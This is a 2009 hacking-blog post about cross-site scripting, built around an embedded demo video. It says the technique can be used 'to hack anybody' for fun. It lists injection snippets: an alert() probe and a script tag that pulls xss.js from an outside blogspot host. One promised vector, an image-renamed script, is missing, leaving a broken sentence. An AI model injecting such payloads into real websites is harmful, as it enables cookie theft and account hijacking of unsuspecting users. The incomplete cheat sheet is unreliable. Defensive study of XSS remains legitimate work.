Wednesday, December 2, 2009

Filled Under: , ,

Basic XSS Cross Site Scripting Demo [Video]

Allot of you guys aren't clear with xss aka cross site scripting and for that many of you were sending me mails on how to do xss attack , etc and that's why i got this video which explains some basic concepts of the Xss attack and how it can be practiced and how can we use it to hack anybody.

This video is controversial by Brial Contos, CISSP from a company named IMPERVA. it takes through each and every step involved to find a xss vulnerability in a webpage . and showcases some of the basic steps that you need to know.

 

What is XSS

Cross-site scripting ('XSS' or 'CSS') is an attack that takes advantage of a Web site vulnerability in which the site displays content that includes un-sanitized user-provided data. For example, an attacker might place a hyperlink with an embedded malicious script into an online discussion forum….

 

That purpose of the malicious script is to attack other forum users who happen to select the hyperlink. For example it could copy user cookies and then send those cookies to the attacker. The Script Injection video should be watched before this video for greater understanding.

 

Video



Conclusion

Now you might be clear with xss attacks it is easy and can be used in man terms to hack anybody or anything else for fun also. Now lets take a look at some of the commonly used xss scripts and code snippets -


Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector:

 

This is most simplest snippet used to find a Xss vulnerability in a webpage.

<SCRIPT>alert('XSS');</SCRIPT>

 

This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):

<SCRIPT SRC=”http://hackerthedude.blogspot.com/xss.js”></SCRIPT>

 

There are many more xss vulnerabilities you can use to bypass the security but they are most useful to find a xss vulnerability in webpage.

 

 

Happy Hacking @hackerthedude

blog comments powered by Disqus